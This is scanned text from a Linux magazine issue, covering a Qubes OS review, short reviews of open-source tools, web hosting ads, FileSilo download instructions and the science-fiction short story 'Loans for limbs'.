Above Qubes OS likes to compartmentalise things. To copy or open a file in another VM, you right-click a file inside the file manager
The biggest change in this release is that the project has
ditched paravirtualisation and switched to virtualisation
interfere with other firewall tools, and the ability to
create multiple disposable VMs.
Perhaps the biggest change in this release is
that the project has ditched paravirtualisation
(PV) and switched over to full virtualisation. Two
critical Xen vulnerabilities forced the team to move
away from PV. The move towards hardware-aided
virtualisation was also supported by the fact that
nearly all recent processors support Second Level
Address Translation (SLAT) virtualisation extensions.
However, this is just a stop-gap measure and Qubes
OS will switch to a new PVH mode that promises
the best characteristics of all virtualisation modes,
as soon as support for the mode improves in the
mainline Linux kernel.
On the visual side of things, the developers have
tried to simplify the management of a Qubes OS
installation by making the user experience more
coherent. One of the most important steps in this
direction is the removal of the Qubes Manager app
whose duties have now been delegated to apps in
other logical places. For example, there’s a Qubes
Manager widget in the system tray that enables you
to monitor and manage AppVMs.
All the VMs in the Qubes main menu now list a VM
Settings entry. This leads to a multi-tabbed settings
panel from where you can control various aspects
of that VM. Settings that affect the operation of
Qubes OS as a whole have been moved to a separate
app named Qubes Global Settings; there’s also a
separate app for creating new custom AppVMs.
All this enhancement comes at a price, however.
Qubes OS has always required more resources than
a typical Linux distro. The latest release has raised
the minimum system requirements a notch. You’ll
now need at least a 64-bit Intel or AMD processor
with support for Intel VT-x with EPT or AMD-V with
RVI. Also, while you can get things done with 4GB of
RAM, at least 8GB is needed to use it productively.
While Qubes OS looks and feels like your average
Xfce-based Linux distro, it isn’t designed as a multiuser system. The user that logs into Dom0 controls
the whole system. Furthermore, Qubes OS currently
doesn’t virtualise OpenGL as that would introduce
a great deal of complexity to the GUI virtualisation
infrastructure, so don’t expect to play Steam games
inside an AppVM of its own just yet.
Mayank Sharma
Provides a streamlined user and
administration experience with
cleaner menus and logically
arranged settings options.
The security enhancements
come at the price of higher
resource requirements and a
steep learning curve.
Old legacy management
apps have been replaced
by new settings windows
and applets that will
also make sense to new
users. Back-end code
has also been cleaned
up. Using Qubes OS
involves a learning curve,
but once mastered
it’ll make you
virtually immune
to attacks.
Fresh free & open source software
OpenShot 2.4
The easy-to-use crossplatform video editor
Editing videos on Linux is perhaps
a similar point to where gaming on
Linux was before the arrival of Steam
– possible but not very popular. This
is strange considering that unlike the pre-Steam
gaming era, there are quite a few feature-rich open
source video editors within your distribution or
its repositories. One of the easiest to get to grips
with is OpenShot 2.4 which is a stability-focused
release with a majority of the work behind the
scenes quashing bugs. That said, the release also
improves several existing functions and adds a few
new ones as well. One of the highlighted changes
is the improvement to how the editor keeps track
of changes. By storing the undo/redo actions in a
file, the new version also elevates the usability of
the automatic save system. The image sequence
exporting capabilities have been expanded and now
support JPG, PNG, JPG, BMP, PPM and various other
image formats as well as ‘Audio Only’ and ‘Video
Only’ export options. The major new addition to this
release is the ability to quickly insert freezes into the
video clips thanks to the new Freeze and Freeze &
Zoom presets option.
Above OpenShot is also available as an AppImage binary that’ll run on any Linux distro without installation
Packs in quite a bit of
functionality within
its very usable and
unassuming interface.
Despite its intuitiveness, in
terms of using it productively,
there’s a learning curve you’ll
have to master first.
Great for…
Giving a professional touch to
your home videos.
TruPax 9B
Easily pack multiple files inside industry-standard encrypted silos
You can encrypt entire partitions
FRESH using the installers of many desktop
FOSS distributions. However, this might be
an overkill if all you want to do is keep
a handful of files away from prying eyes. Using
TruPax, you can easily pack individual files into
VeraCrypt/TrueCrypt compatible containers. But
why would you use TruPax when you can just as
easily use the fairly intuitive VeraCrypt app itself?
For one, when creating containers with VeraCrypt
you need to have some idea about the size of files
it’s going to house. Once created, this encrypted
container cannot be resized, which is particularly
painful when you find that it doesn’t have enough
space for the files. On the other hand, when you
select the files you wish to encrypt with TruPax,
it creates a container of exactly the same size as
the selected files. Optionally, however, you can
ask the tool to add some more free space to the
encrypted volume if you think you’ll need it later
on. Despite the fact that TruPax has been under
development for quite some time, you won’t find it
in the repositories of popular distributions. So grab
the compressed archive from its website and extract
it. Then call the ./ script, to anchor the app
to /opt/trupax/ as well as to the application menu.
The app’s graphical interface is fairly intuitive to
operate – just select the files and folders you want
to encrypt, give the container a name and press the
‘Make Volume’ button.
Save disk space by creating
encrypted silos that are just the
right size for your selected files.
Unlike VeraCrypt, TruPax
creates encrypted containers
not hidden volumes.
Great for…
Parking multiple files into
portable encrypted volumes.
DDRescue-GUI 1.7.1
Use the powers of ddrescue from the convenience of a GUI
If you’ve ever lost data due to
hardware failure, chances are you
have been asked to make block-level
copies of the failing drive first with
the venerable ddrescue utility before attempting
to rescue data. The best thing about ddrescue is
that it doesn’t write zeros to the output when it runs
into bad sectors in the input. So, every time you
run it on the same output file, it tries to fill in the
gaps without wiping out the data already rescued.
The only downside is that ddrescue is a CLI utility
and you need to read through its man page before
you can use it productively. DDRescue-GUI, as the
name suggests, wraps the powerful utility inside
a graphical interface. This significantly lowers the
entry barrier and makes ddrescue accessible to
a whole lot of users. DDRescue-GUI is written in
Python and has a very low footprint, which makes
it usable on older computers as well. The utility’s
interface, which is inspired by the now deprecated
KDiskRescue tool, shouldn’t intimidate new users
and its workflow is fairly straightforward. Just fire up
the tool and select the disk that needs to be imaged
and the destination where the image needs to be
saved. For a more effective recovery process, you
should also specify the location for saving a log file
that not only speeds up the imaging process but also
comes in handy when you want to restore the image.
You’ll find precompiled binaries and source on the
project’s Launchpad page.
The graphical user interface
makes ddrescue accessible to
inexperienced users.
The GUI doesn’t expose all the
functionalities offered by the
CLI ddrescue utility.
Great for…
Quickly making a block-level
copy of a dying disk.
Rambox 0.5.12
Bring all communications
under one roof
Virtually all desktop distributions ship
with a default messaging app that
allows you to sign into multiple online
messaging services. While a great help,
these apps track only a handful of popular services.
Rambox, on the other hand, has a much wider
mandate. With its latest release, you can sign into
89 online messaging and email services! The app is
fairly intuitive to use. Every added service resides
within its own tab, from where you browse the
message history, write messages to your contacts, or
use other means of communication supported by the
service. The app will also display notifications and
parks itself in the system tray. You can lock Rambox
when you step away from the computer to ensure no
one else can read your messages. Rambox also has
the ability to sync configurations if you use the app
on multiple computers. The FOSS app respects your
privacy. Instead of storing your personal information,
Rambox uses the partition:persist attribute of the
<webview> tag to create a persistent connection
with the signed-in service. The app is available
as an AppImage binary that you can use without
installation on any Linux distribution.
Above The app supports many services including Gmail, Skype, Facebook, WhatsApp and Telegram
Unifies various online
messaging services inside a
neat graphical app that’s easy
to use and install.
Great for…
Can get slow and clunky
if you sign into several
services, especially on
older computers.
Tracking communications from
multiple sources.
Web Hosting
Get your listing in our directory
To advertise here, contact Kate | 01225 687439
Hosting listings
Featured host:
Use our intuitive Control
Panel to manage your
domain name
0370 321 2027
About us
Part of a hosting brand started in 1999,
we’re well established, UK based,
independent and our mission is simple
– ensure your web presence ‘just works’.
We offer great-value domain names,
cPanel web hosting, SSL certificates,
business email, WordPress hosting,
cloud and VPS.
What we offer
•Free email accounts with fraud, spam
and virus protection.
•Free DNS management.
•Easy-to-use Control Panel.
•Free email forwards –
automatically redirect your email to
existing accounts.
•Domain theft protection to prevent it
being transferred out accidentally or
without your permission.
•Easy-to-use bulk tools to help you
register, renew, transfer and make
other changes to several domain
names in a single step.
•Free domain forwarding to point your
domain name to another website.
5 Tips from the pros
Optimise your website images
When uploading your website
to the internet, make sure all of your
images are optimised for the web! Try
using software; or if using
WordPress, install the EWWW Image
Optimizer plugin.
Host your website in the UK
Make sure your website is hosted
in the UK, not just for legal reasons! If
your server is located overseas, you
may be missing out on search engine
rankings on – you can
check where your site is based on
Do you make regular backups?
How would it affect your business
if you lost your website today? It’s vital to
always make your own backups; even if
your host offers you a backup solution,
it’s important to take responsibility for
your own data and protect it.
Trying to rank on Google?
Google made some changes
in 2015. If you’re struggling to rank on
Google, make sure that your website
is mobile-responsive! Plus, Google
now prefers secure (HTTPS) websites!
Contact your host to set up and force
HTTPS on your website.
David Brewer
“I bought an SSL certificate. Purchasing is painless, and
only takes a few minutes. My difficulty is installing the
certificate, which is something I can never do. However,
I simply raise a trouble ticket and the support team are
quickly on the case. Within ten minutes I hear from the
certificate signing authority, and approve. The support
team then installed the certificate for me.”
Tracy Hops
“We have several servers from TheNames and the
network connectivity is top-notch – great uptime and
speed is never an issue. Tech support is knowledge and
quick in replying – which is a bonus. We would highly
recommend TheNames. ”
Avoid cheap hosting
We’re sure you’ve seen those TV
adverts for domain and hosting for £1!
Think about the logic… for £1, how many J Edwards
“After trying out lots of other hosting companies, you
clients will be jam-packed onto that
seem to have the best customer service by a long way,
server? Surely they would use cheap £20
and all the features I need. Shared hosting is very fast,
drives rather than £1k+ enterprise SSDs!
and the control panel is comprehensive…”
Remember: you do get what you pay for!
SSD web hosting
Supreme hosting
0843 289 2681
0800 1 777 000
Since 2001, Bargain Host has
campaigned to offer the lowest possible
priced hosting in the UK. It has achieved
this goal successfully and built up a
large client database which includes
many repeat customers. It has also
won several awards for providing an
outstanding hosting service.
CWCS Managed Hosting is the UK’s
leading hosting specialist. It offers a
fully comprehensive range of hosting
products, services and support. Its
highly trained staff are not only hosting
experts, they’re also committed to
delivering a great customer experience
and passionate about what they do.
• Colocation hosting
• 100% Network uptime
• Shared hosting
• Cloud servers
• Domain names
Value Linux hosting
Value hosting | 0800 035 6364
02071 838250
WordPress comes pre-installed
for new users or with free
managed migration. The
managed WordPress service
is completely free for the
first year.
We are known for our
‘Knowledgeable and
excellent service’ and we
serve agencies, designers,
developers and small
businesses across the UK.
ElasticHosts offers simple, flexible and
cost-effective cloud services with high
performance, availability and scalability
for businesses worldwide. Its team
of engineers provide excellent support
around the clock over the phone, email
and ticketing system.
0800 051 7126
HostPapa is an award-winning web hosting
service and a leader in green hosting. It
offers one of the most fully featured hosting
packages on the market, along with 24/7
customer support, learning resources, as
well as outstanding reliability.
• Website builder
• Budget prices
• Unlimited databases
Linux hosting is a great solution for
home users, business users and web
designers looking for cost-effective
and powerful hosting. Whether you
are building a single-page portfolio,
or you are running a database-driven
ecommerce website, there is a Linux
hosting solution for you.
• Student hosting deals
• Site designer
• Domain names
• Cloud servers on any OS
• Linux OS containers
• World-class 24/7 support
Small business host
01642 424 237
Fast, reliable hosting
hosting: | +49 (0)9831 5050
Hetzner Online is a professional
web hosting provider and
experienced data centre
operator. Since 1997 the
company has provided private
and business clients with
high-performance hosting
products, as well as the
necessary infrastructure
for the efficient operation of
websites. A combination of
stable technology, attractive
pricing and flexible support
and services has enabled
Hetzner Online to continuously
strengthen its market
position both nationally
and internationally.
• Dedicated and shared hosting
• Colocation racks
• Internet domains and
SSL certificates
• Storage boxes
01904 890 890
Founded in 2002, Bytemark are “the UK
experts in cloud & dedicated hosting”.
Their manifesto includes in-house
expertise, transparent pricing, free
software support, keeping promises
made by support staff and top-quality
hosting hardware at fair prices.
• Managed hosting
• UK cloud hosting
• Linux hosting
Get your free resources
Download the best distros, essential FOSS and all
our tutorial project files from your FileSilo account
Every time you
see this symbol
in the magazine,
there is free
online content
that's waiting
to be unlocked
on FileSilo.
• Secure and safe
online access,
from anywhere
• Free access for
every reader, print
and digital
• Download only
the files you want,
when you want
• All your gifts,
from all your
issues, all in
one place
Go to and follow the
instructions on screen to create an account with our
secure FileSilo system. When your issue arrives or you
download your digital edition, log into your account and
unlock individual issues by answering a simple question
based on the pages of the magazine for instant access to
the extras. Simple!
You can access FileSilo on any computer, tablet or
smartphone device using any popular browser. However,
we recommend that you use a computer to download
content, as you may not be able to download files to other
devices. If you have any problems with accessing content
on FileSilo, take a look at the FAQs online or email our
team at
for digital
readers too!
Read on your tablet,
download on your
Log in to
Subscribe and get instant access
Get access to our entire library of resources with a moneysaving subscription to the magazine – subscribe today!
This month find...
In the FileSilo you will find the latest
version of the impressive Manjaro Linux
Xfce Edition 17.0.5, Parrot Security 3.8 and
Tiny Core Linux 8.1.1.
We’ve packed in a lot of tutorial code
this month, but we’ve stilled managed to
squeeze in all the Python code editors –
Eric, PyCharm Community Edition, PyDev
and Thonny – that were in the group test.
You’ll find all the resources needed for
Python/Minecraft, the Enviro pHAT ghost
detector, the Java game and the OVA file
for the pen-testing challenge!
& save!
See all the details on
how to subscribe on
page 32
Short story
Stephen Oram
Loans for limbs
hristopher’s neck was bruised where they’d
held him down while forcibly removing his
arms and legs. He’d fought them hard, but it
had been pointless; here he was, dumped by
the side of the road in an old, damp car seat, helpless
and homeless.
Tears were rolling down his face and he could do
nothing about them.
How could it have come to this? Less than a year
ago he’d taken an affordable loan from a company that
owned massive driverless trucks. He’d replaced his
arms and legs with prosthetics to become a highly paid
and highly sought-after new-breed trucker with enough
strength to load and unload the huge cargos.
Now look at him. Useless. Slumped on a dirty seat in
the gutter with the small begging bowl the bailiffs had
graciously left in front of him.
A group of people approached and his hopes rose. As
they got close he called out. ‘Please, help me.’
One of the women strolled across and stood over him.
‘What happened?’
‘Couldn’t keep up the payments,’ he said. ‘Will you
help?’ He jutted his chin towards the bowl.
Her husband joined her. ‘You didn’t think about this
when you put the rest of us out of work, did you?’
‘No. It has to be said. I didn’t care for his type then and
I most certainly don’t care for them now.’ He spun the
seat around with the tip of his foot and left Christopher
facing the wall. ‘C’mon, let’s get out of here.’
So, it had come to this. At first it’d been great –
the wages were high and the loan repayments were
comparatively low. The envy of former co-workers was
sweet and the job was a doddle.
He’d spent days on end sitting in his cab
as it drove itself from one end of the country
to the other. At random intervals the truck
would require a button to be pressed to
prove he was alert, but his right arm was
configured to send a small jolt to his brain to
prompt him. And, his left arm would deliver hits
of amphetamine to keep him awake whenever he
squeezed his thumb and fourth finger together.
It was easy.
Then it began. The trucks were constantly upgraded
with ever more sophisticated systems that required
upgrade after upgrade to his limbs. He’d increased
the loan to buy the upgrades, but it hadn’t been long
Eating Robots
Taken from the new
book Eating Robots
by Stephen Oram:
near-future sciencefiction exploring the
collision of utopian
dreams and twisted
realities as humanity
and technology
become ever
more intertwined.
Sometimes funny
and often unsettling,
these 30 sci-fi shorts
will stay with you long
after you’ve turned
the final page.
before he’d fallen behind with
the payments.
He stared at the wall,
wishing he could punch it.
A stray dog with a human skull
in its mouth stood nearby, watching.
‘Good boy,’ he said, hoping he hadn’t betrayed his fear.
The dog dropped the skull and snarled. He snarled back,
tried to rock himself off the seat but failed and felt a
surge of the toxic mix of anger and hopelessness.
‘Get out of it,’ shouted a woman from behind him. He
tensed, expecting more abuse as a stone hit the ground
just in front of the dog. ‘Hi,’ she said over his shoulder.
‘Piss off,’ he shouted.
‘We can help.’
‘Go away.’
She knelt down, dropping a cheap prosthetic
leg next to him. ‘Honestly, we’re here to help you.
What happened?’
‘I couldn’t keep up the payments so they repossessed
my car, my house and eventually my limbs. Oh, and then
they dumped me here. Satisfied?’
‘Come with us. We can fit you up with these,’ she said,
tapping the leg.
‘I told you. I’ve zero cash. Absolutely zero. Nothing.’
Two men lifted the seat with Christopher still in it and
strolled towards a white van parked on the other side of
the street.
‘Oi! What do you think you’re doing?’ he shouted.
She talked as she walked alongside. ‘We’re a charity.
We rescue the victims of these disgusting corporations.
It’s what we do.’
‘Yeah? Forgive me if I don’t believe you.’
As they lifted him into the back of the van, he
recognised the arms and legs on the floor.
‘Hey, they’re mine,’ he shouted.
‘Shhh,’ she said. ‘I know. They’re unique, so once
repossessed they have no commercial value. They throw
them away and at night we sneak in and steal them back.’
He lifted his head to look her in the eyes.
She laughed. ‘Then we find the owner and reunite
them. Neat, eh?’
He smiled as she wiped the tears from his face.
YOUR FREE DISC | Ubuntu goes GNOME | Machine learning
Журналы и газеты
Размер файла
15 520 Кб
Linux User & Developer, journal
Пожаловаться на содержимое документа